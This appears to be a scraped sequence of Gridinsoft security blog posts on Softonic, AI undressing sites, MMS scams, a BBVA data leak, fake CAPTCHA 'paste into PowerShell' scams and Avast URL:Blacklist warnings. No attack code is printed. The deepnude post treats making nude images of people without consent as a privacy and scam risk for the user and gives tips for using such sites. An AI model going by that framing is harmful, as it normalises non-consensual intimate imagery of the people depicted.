For ones who are only vaguely familiar with Softonic, it is a large software library website; think of it as an application market, but in a web format and for PC. This website started long ago, and officially partners with software developers, helping them to promote and spread their programs.

Together with the official version, the site may offer cheaper license options from various sources. In this case, they team up with other online services that seek for discounts, game accounts available for sale, and so on. This conjunction of official and wallet friendly options is what gave the website its popularity, yet also raised quite a few questions about the legality.

Is Softonic Safe to Use?

The short answer for that question is yes, it is mostly safe, as there are almost no risky applications offered on this platform. Pirated programs, keygens or activators of different sorts, that typically serve as a source for malware, are excluded as a class here. But deeper research reveals a few points that made me concerned about ethical and legal aspect of the question.

Excessive Advertising

Softonic website is quite literally flooded with advertisements. While it is not an unheard practice, and one can easily name a handful of other legit sites that have the same problem, the situation with Softonic is different.

In ad placement and info sharing, it uses both Google Ads and other, “alternative” ad networks, with some of them being recognized as quite clearly unwanted. To put it simply, data about you and actions you did on the website will end up in the hands of shady actors. It is not always a beginning of a bad story, yet it is better to avoid trying your luck with such questionable characters all together.

Dangers that ads on Softonic can pose typically range from unwanted applications to adware and browser hijackers. Nothing too serious, but I’m pretty sure no one will like seeing their browser overfilled with ads and running a strange starting page.

Bundled software distribution and copyright violations

Softonic goes further with its dodgy monetization practices by pushing bundled software together with the program you download. This is particularly the case when we talk about free programs and apps that are no longer supported by their developers. The site even got into a public argument with a community of free game developers for continuing to offer the game packed with bundled apps even after the game itself was shut down.

As you may guess, revenue from each installed bundled application goes into their pockets. Same as in the case of on-site ads, there is little to no control over what exactly is promoted, meaning that there is a high chance of getting an unwanted program installed along with the desired program.

Questionable Discount Offers

Almost all the discounts that Softonic offers for its users come from strange websites that specialize on selling software license keys for cheap. While it may look like a type of legit business, it may also be a part of black market network related to money laundering. Stolen or otherwise illegally acquired funds are getting “washed clean” by purchasing software and getting it sold at a discounted price. Alternatively, these licenses may be leaked following the spyware/infostealer attack, in which case its cost for the reseller is effectively 0.

Sure enough, not all cheaper offers are about some dodgy activity, but this is what backs the majority of such offers. Buying software for cheap from the discounter shop that shares no info about how did they get such a deal eventually turns into sponsoring the future shady activity. Some of them say about re-selling “used licenses”, yet there is no evidence of them being pre-owned.

Also, it is possible to have issues while purchasing the game or program, and there will be little to no remedy. There may be payment issues and delays; digital license keys may not work or the offered software may miss your expectations. When buying from a developer, you will get such problems sorted in the matter of minutes with the help of tech support. Yet I personally question the quality and availability of support on those third-party reseller websites.

Can I use Softonic to download programs?

Yes, you can. At the end of the day, even with all the said quirks in mind, Softonic is a totally normal software library that offers (mostly) safe and legit software. If you are desperate for getting a specific piece of software at a lower price, this may be a good place to search in.

Yet my recommendation will be to stick to the source, i.e. purchase programs at the websites of their respective developers. This way, you ensure that no ad injection or shady money manipulations happen in the background. I will also recommend using a strong anti-malware solution – to eliminate any risks related to the software from unofficial sources.

GridinSoft Anti-Malware is a program that will get you covered. Its multi-component detection system will quickly recognize and block any malicious activity, including one coming from the most modern advanced threats. Download it by clicking the banner below, and try all-encompassing protection with a 6-day free trial option.

The post Is Softonic Safe? appeared first on Gridinsoft Blog.

Are AI Deepnude Sites Safe & Legit?

First and foremost – yes, there are quite a lot of online AI deepnude services that are totally real, and you will in fact get the undressed photo in return. Availability of open-source AI models allow quite a few entrepreneurs to get into such activities, so you can see quite literally dozens of them around.

Yet not all the websites are safe and will do what is promised. There are enough con actors who see the rush towards AI undressing services and try to get their bite without offering any actual services, or by tricking users into shady activities. Let me walk you through the key risks that you may face trying to use AI deepnude websites.

Privacy risks

One of the main concerns regarding any online AI services, deepnude ones included, is privacy. Photos generated by the AI are kept on the website; there is no real way to enforce their encrypted state, as they appear as a part of the content. Thus, pics of someone you know may soon appear in advertising materials of this, or a different deepnude service – and there is nothing you can do about that. Even if you ask for GDPR user data removal, edited pictures are likely to be stored separately, i.e. they do not belong to user-specific data.

A question that touches all sites that operate in such a spicy industry is data security. You upload the pictures of someone you know, share your email address, nickname and, in certain cases, even location. The data of one user is not a big deal, but data of thousands of people makes much more impact and costs a lot on shady marketplaces.

Not all AI undressing websites sell data, but it is particularly hard to control whether they are going to. The general rule of thumb is to use a burner email and expose as little real data about yourself as possible. That is particularly needed when we take into account the next problem.

Ethic concerns

One major part of any dealings with someone’s naked photos is ethics. While consensual photos of that matter are not a problem at all, ones created with AI generation are not. You can face a significant backlash or even have legal problems for generating such images and sharing them publicly. Even if one has generated the picture for themself, it may get leaked to the public due to the way the service operates.

Another ethical aspect is the possibility of a malicious misuse of deepnude technologies. It is common to see blackmail messages that threaten to publish some compromising graphical materials about the user. While before all these threats had nothing backing them up, nowadays wannabe-hackers may really generate some naked content with the victim and start posting it online. Sure, it will be quite simple to tell it is an AI generated image, but it is hard to miss how unpleasant and dirty the situation is.

AI deepnude scams

The most critical issue with AI deepnude generators is the wide variety of scams that this industry is riddled with. Huge influx in popularity, along with unclear understanding of how such services should work make it an ideal field for fraudsters.

Asking for money, returning nothing. One of the most common and obvious scams is taking money for generating the picture and returning nothing, or a subpar image. Bad service quality is multiplied by the inability to return your money. To go below radars of payment systems such sites ask one to pay for a seemingly unrelated thing on a separate website. And this is exactly what makes reversing the payment impossible.

Collecting excessive amounts of user data. Another possible way of defrauding customers is by asking for excessive amounts of information during registration. The resulting images may in fact be of a subpar quality, but frauds will get every single sensitive detail about you before one can try out the site. All such services collect user data to some extent, but only malicious ones ask for way too much info and definitely aim at selling the data in future.

Demanding the user to install applications. One of the ways of monetization that AI deepnude websites may pick is by offering users to install certain apps or browser extensions. While there is a possibility of some of such apps being safe and legit, it is much more likely to get something shady and unwanted. Adware, browser hijackers or even scareware may use undressing AI sites for spreading – and you never know what exactly they offer you to download.

How do I understand that an Undressing AI Website is Safe?

To see whether the website you have found is trustworthy or not, consider using our free Website Reputation Checker. This web utility performs comprehensive checks of the website, and returns a clear verdict of whether there is any questionable activity happening.

It may be particularly complicated to understand whether the AI deepnude site is trustworthy before using it without special tools. Risking the money is not an option for many, and using only free options means exposing yourself to risk with even higher probability. That is why a Website Reputation Checker will be the best choice for that situation.

For continuous protection though, I would recommend you to install GridinSoft Anti-Malware. Its web protection feature will block shady websites at the very moment they are trying to open in your web browser. Download it by clicking the banner below and enable Internet Security in the Protect tab – that will get you covered.

The post AI Deepnude Websites – Are they Safe & Trustworthy? appeared first on Gridinsoft Blog.

MMS Scams Are on the Rise

The researchers have noticed a significant increase in messaging scams, i.e. ones that rely upon messages sent over cellular networks rather than through the Internet. Since May, reports of abusive mobile messages in the U.S. have surged by 39%. But within this trend, one notable aspect gets into eyes. Fraudsters are turning to old, seemingly forgotten technologies, with one of them being MMS abuse.

Over the same period, complaints about fraudulent MMS messages have skyrocketed by 220%. These scams often use images or graphics to enhance the credibility of their messages. Effects of such scams, however, are not really different from email or social media spam: lost money, exposed personal data and potential identity theft.

Short reminder – MMS is…?

MMS is short for Multimedia Messaging Service, one of two messaging technologies offered by cellular carriers. Back in the days when phones weren’t smart, this and SMS were the only way to exchange pics and text. MMS is built on the same foundation as SMS, but unlike the latter allows users to send and receive multimedia content via cellular network, such.

With the advent of iMessage, WhatsApp, and other messengers, this technology was thought to be obsolete. Quite a few cell carriers have disabled this service due to the absent demand. Still, it is so seamlessly integrated into mobile messaging today that most people don’t even notice when they’re using it. Well, scammers definitely notice, and aim at abusing it at any given moment.

MMS Abuse Details

The numbers paint a worrying picture. Since the beginning of the year, the reports about MMS scams surged by 429%, with most of the uptick happening in the last few months. In fact, the increase in scammer interest in multimedia messages started around October 2023, but was increasing pretty slowly until summer of 2024. Today, MMS scams represent over 21% of reported abuses.

The numbers are definitely influenced by the large number of devices capable of receiving these messages. We are talking not only about mobile phones, but also all IoT devices capable of holding a SIM-card. The overall estimate of the devices that may receive a scam message floats around 300 million in the US alone – that is about 90% of the country’s population.

Research has also shown how quickly people tend to read and respond to mobile messages, usually within just three minutes. That clears out the reason for such an unusual interest from cybercriminals: folks appear to treat cell messages as a more important, and probably a more trusted thing.

Scam Examples

MMS scams take various forms, but they all rely on visuals to deceive people. Con actors might send fake notifications pretending to be from banks or financial institutions, claiming there’s an issue with your account. There are 3 main types of fraudulent messages that you can expect – impersonation scams, fake invoices and delivery scams.

We begin with impersonation attacks, ones that target people under the guise of a renowned company or a person. Scammers use MMS capabilities to send the “proofs” of their legitimacy, i.e. documents or pictures of themselves. Though modern photo editing technology capabilities are known to a wide audience, such a fraud works mostly with elderly and children.

Key demand in impersonation scams is, as usual, money or sensitive information. Frauds tell about a lucrative “send money, receive twice as much back” program or about being in need of a tiny bit of money with the promise of 2-3 days return.

Delivery scams are one of the longest running ones, with attacks happening ever since major delivery services started sending notifications via SMS. The scammer sends a message pretending to be from a courier service like FedEx, UPS, or DHL. The message claims that a package couldn’t be delivered due to incorrect shipping details or unpaid fees.

The link that is always attached to the message should help with “rescheduling delivery” or “paying outstanding charges”. In fact, it leads to a phishing site designed to steal credit card information or personal details. These scams are especially effective during busy shipping seasons like the holidays, when many people are expecting deliveries and thus lose vigilance.

Another type of fraud is fake invoice scams. In this type of scam, you may receive a message that includes an image of a fake invoice or receipt for a product or service you didn’t purchase. The scam often claims you owe money and provides a link or phone number to “resolve the issue.” For instance, a scammer might send a message pretending to be from an online retailer, saying you’ve been charged for an expensive item you didn’t order.

How to Avoid MMS Scams

Staying safe from MMS scams doesn’t require much – just a little caution can go a long way. If you receive a suspicious message, especially one with images or links, avoid interacting with it. Only share your phone number with trusted sources to reduce the chances of being targeted. If a message includes a link, don’t click on it. Instead, use your browser or a verified app to visit the sender’s official website directly.

If you suspect a message is a scam, report it. iOS and Android devices have a built-in feature “Report Spam”. You can also forward the message to 7726 (SPAM) to alert your mobile provider and help improve scam detection. Lastly, always download apps from trusted app stores to minimize potential risks. Carefully review the permissions requested by these apps before granting access.

The post Top 3 MMS Scams: What Threats Can Messages Bring appeared first on Gridinsoft Blog.

BBVA Hacked, Transaction Data Leaked on the Darknet

The BBVA Bank leak published by Gatito_FBI_NZ consists of a huge number of tables that contain well-structured data about transactions that the bank has handled. Timespan of the leak includes records of the last several months, and contains cardholder names, location of transactions (down to the establishment where the payment was made), date, card status and also some internal codes.

One more detail that should concern the clients of the bank (and BBVA themselves, obviously) is that the hacker also shares usernames and passwords for admin accounts of the bank technical pages. Sure enough, the bank infrastructure admins will change them pretty soon, but this is pretty demonstrative for Gatito_FBI_NZ really having access to the network. This is also confirmed by the screenshots of internal interfaces with corresponding data displayed on them.

In the publication, the hacker also mentioned “a vulnerability”, which potentially is the short explanation of how they get into the bank’s internal network. Though, there is no details on which exact flaw was used; the word may simply be misused, considering the rest of the message.

It is rather strange that the attacker asks nothing for such a data chunk. It is typical for cybercriminals to dispose of less important info they’ve got from a hack, creating additional pressure on the attacked company. This may actually be the case in this attack: the guy did not find anything special in the BBVA Bank data and decided to make it a public domain. Whether they had their hands on actually important data – this we did not know.

Is there a risk for BBVA bank clients?

With such a massive data leak, especially considering that it is readily available to the public, there can and would be attacks based off of it. Mainly they’d revolve around email, SMS and voice phishing scams, or, in certain cases, attempts to charge a bank account. This gives us enough info to give you precaution advice: follow them for a few months, and the risks will decrease significantly.

1. Any offers that are too good to be true are not true. If someone offers you a tempting deal and it looks like they know you, you’d better check all things twice before sticking to that offer. With the information from databases, adversaries can understand your habits and thus prepare a well-disguised targeted attack.
2. Track your bank transactions. Having this much information directly from the bank, fraudsters can try using it to charge customers’ accounts. There are ways to get card numbers and other identifiers, which is enough to initiate a transaction. If there is any suspicious activity – order to suspend the account and revert the unknown transactions.
3. Treat all the phone calls, emails and SMS from the bank with extra caution. The most obvious trick frauds may try to pull is to contact people saying there’s something wrong with their BBVA bank account. Typically, they push users into sharing security codes, which grant them access to the account and all the funds. Double-check phone numbers and email addresses that contact you about this matter, and never share security codes with anyone who asks for it – they are only for your sign-in operations.

The post Hacker Leaks BBVA Bank Data, Including User Details appeared first on Gridinsoft Blog.

What is Verify you are human scam?

“Verify you are human” is a chain of malignant websites that trick visitors into downloading and running malicious programs. As you could have guessed by the name, they mimic CAPTCHA pages, but in fact have nothing in common with normal human verification sites. Their methods mainly target people who are not aware about how the verification works normally.

Most often, users get to such pages after clicking a certain part on a shady website, like a page with pirated movies or unlicensed software. Frauds who maintain such websites stuff every interactive element with redirections, that throw visitors to malicious pages of various kinds. As the redirect happens to the same tab, Verify you are human scam pages are really convincing for unsuspecting users.

We earlier wrote how Lumma Stealer spreads through such fake verification sites. It covers quite an extensive fraudulent scheme that attacks hundreds of people each day – consider checking it out.

How does this scam work?

On the Verify you are Human page, the user sees just a button saying “I am not a robot”. Upon clicking it, the button changes to a request to open PowerShell (or, in some cases, Command Prompt), press Ctrl+V combination and Enter. But inside, users get a malicious script copied to the clipboard when they click the first button. Below, you can see our analysis of such a script:

Once they paste that script into PowerShell, the main course of attack happens. This script contains base64-encoded instructions to connect the remote server, download a file and run it. Obviously, there’s no hope any of the files downloaded that way will be legitimate. Here is the short list of malware types that can infect computers in such a way:

Malicious browser extensions. This is a type of virus that has become massively widespread over the last few months. Their key purpose is intercepting search queries and throwing the user to a no-name search engine, with the results riddled with advertisements. Additionally, such plugins appear to collect personal information about the user, that the browser keeps for auto fill forms.

I’ve covered several malicious browser extensions that were enormously widespread a few weeks ago. If you are interested in learning more about such threats, here is the article about PrimeLookup browser extension.

Infostealer or backdoor malware. These are among the most dangerous malware types, due to stealthiness and delayed damage potential. It is hard to notice the symptoms of their activity, but later, one can see online accounts being stolen. Backdoors can also selectively steal specific files and provide remote access to the computer.

Unwanted programs. The variety of this type is vast: from fake system optimizers to “advanced search bars” that hijack the web browser and act pretty much like the said malicious browser extensions. They rarely hide their presence, and, quite contrary, try convincing the user about being tremendously useful.

How to delete malware?

If you have interacted with a Verify you are human scam page, chances are, there is a pesky malware running in the system. To get rid of it and any of its traces, consider running a Full scan with GridinSoft Anti-Malware. This program will quickly delete any malicious program, regardless of their source and form. And there is a free trial option, too – no card info needed. Click the banner below and get your system cleaned up.

To avoid getting to such websites in future, you can block redirections completely, so no website will be able to pull you into another dirty scam. Disabling redirects is a rather simple process, here is a step by step guide for Google Chrome and Chromium-based browsers:

• Step 1. Open Chrome, then go to the Settings tab. Here, opt for the Privacy and Security tab in the left menu.

• Step 2. All the way down, you will see the Site Settings menu. Click it, and scroll down to Popups and Redirect part.

• Step 3. In here, set the Default behavior to “Don’t allow sites to send popups or use redirects”. This setting will block the redirections, and, as a bonus, disable push notifications.

The post Verify you are Human Scam appeared first on Gridinsoft Blog.

What is URL:Blacklist Detection?

URL:Blacklist is a detection generated by the network security engine integrated into Avast and AVG antivirus solutions. This protection feature is enabled by default and actively monitors all outgoing connections from your device, blocking those deemed potentially harmful. When you attempt to visit a website that the security engine identifies as suspicious or dangerous, you’ll receive a URL:Blacklist warning alerting you to the potential risk.

One significant limitation of this detection is its lack of specificity. Unlike some security alerts that provide detailed information about the exact nature of the threat, URL:Blacklist warnings typically offer minimal context about why a particular site was flagged. This ambiguity can leave users confused about the severity of the risk and whether it’s safe to proceed.

It’s important to understand that URL:Blacklist doesn’t always indicate malware activity, though this can certainly be one reason for the alert. These warnings can be triggered by various types of suspicious or potentially harmful websites, ranging from online scams and phishing attempts to legitimate sites that have been compromised to distribute malware.

When you encounter a URL:Blacklist warning and need more specific information about the potential threat, we recommend using a free online website checker to perform a more detailed analysis of the flagged URL.

Web Browser Initiates connection Avast/AVG Checks URL Input Sources Possible Outcomes SECURITY DECISION Dangerous Site Access blocked Safe Site Access allowed False Positive User exception Safe URL Harmful URL 1. User 2. Connection 3. Avast/AVG checks URL 4. Security decision User clicks a link Sends request Shield scan Warning Proceeds Add to exceptions

Types of Websites That Trigger URL:Blacklist Warnings

Various types of websites can trigger URL:Blacklist warnings. Understanding these categories can help you better interpret what these alerts might be trying to protect you from:

Below, you can see examples of dangerous websites that have triggered URL:Blacklist warnings, analyzed with online scanning tools. These examples demonstrate different types of threats and show how even seemingly legitimate sites can pose significant risks.

Examining these examples reveals certain patterns. Sometimes, the URL itself offers clues about a website’s legitimacy, as dangerous pages often use unfamiliar domains with seemingly random characters. However, this isn’t always a reliable indicator, as many scam websites—particularly those designed for shopping fraud—often use clear, believable domain names designed to appear legitimate at first glance.

Understanding False Positive Detections

While URL:Blacklist detection helps protect users from genuine threats, the system is not perfect. There are numerous reported cases where URL:Blacklist incorrectly flags legitimate and safe websites^{[1], [2]}. These false positives can occur for various reasons, usually related to the detection mechanisms employed by the antivirus software.

Based on user reports from various forums, certain types of legitimate websites seem particularly prone to triggering false URL:Blacklist warnings:

• File-sharing services: Platforms that allow users to share files, even legitimate ones, may be flagged due to their potential for distributing malicious content.
• Cryptocurrency mining pools: Crypto mining pools are often flagged because some malware uses similar connections for cryptocurrency mining without user consent.
• Newly created websites: Recently launched websites may lack sufficient reputation history to be considered trustworthy by security databases.
• Less popular but legitimate websites: Sites with lower traffic volumes may not have established sufficient trust signals for security algorithms.

While the caution exercised by Avast and AVG is understandable, these false positives can be frustrating, especially when they block access to websites you know to be safe and need to use regularly.

How to Handle URL:Blacklist False Positives

If you encounter a URL:Blacklist warning for a website you know to be safe, you have several options:

Option 1: Add the Website to Exceptions (Recommended)

For users who want to maintain the protection of Avast/AVG’s web shield while allowing access to specific trusted sites, adding the website to your exceptions list is the recommended approach:

1. Open Avast or AVG antivirus software
2. Navigate to Settings → General
3. Find the Exceptions tab
4. Click the Add Exception button
5. Paste the URL of the website you want to allow
6. Click Add Exception to confirm

This method allows you to maintain protection against genuinely dangerous sites while preventing false positives for specific trusted websites.

Option 2: Disable Web Shield Protection

If you find the URL:Blacklist feature too restrictive or encounter frequent false positives, you can disable the Web Shield component entirely. Note that this will reduce your protection against malicious websites:

1. Open Avast or AVG antivirus
2. Go to Settings → Protection → Core Shield
3. Select the Web Shield tab in the top navigation
4. Uncheck all options to disable web protection
5. Restart your computer to apply the changes

Before disabling this protection, consider whether the convenience outweighs the potential security risks. If you choose to disable Web Shield, it’s advisable to exercise additional caution when browsing and consider using alternative web protection tools.

When URL:Blacklist Warnings Indicate Malware Infection

While many URL:Blacklist warnings occur when you deliberately try to visit a website, a particularly concerning scenario is when these alerts appear frequently and seemingly at random, regardless of what websites you’re trying to access. If you notice URL:Blacklist warnings appearing constantly during your normal browsing activities, this could indicate a malware infection on your system.

Several types of malware can trigger these persistent URL:Blacklist warnings by attempting to connect to malicious servers in the background:

• Adware: Less severe but annoying malware that displays unwanted advertisements and may redirect your browser to promotional websites.
• Browser Hijackers: Malware that modifies browser settings to redirect searches and visits to specific websites without user consent.
• Backdoors: More dangerous malware that provides attackers with remote access to your system, often attempting to communicate with command and control servers.
• Loaders: Malicious programs designed to download and install additional malware from remote servers.

The last two categories pose significant security risks and should not be ignored. If you suspect a malware infection is causing URL:Blacklist warnings, performing a thorough system scan with specialized anti-malware software is strongly recommended. For effective detection and removal of these threats, GridinSoft Anti-Malware is an excellent choice, as it’s designed to identify and eliminate threats that other antivirus solutions might miss.

How to Remove Malware Causing URL:Blacklist Warnings

If you’re experiencing persistent URL:Blacklist warnings that suggest a malware infection, follow these steps to scan and clean your system:

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Frequently Asked Questions

The post URL:Blacklist Detection Avast and AVG Warnings appeared first on Gridinsoft Blog.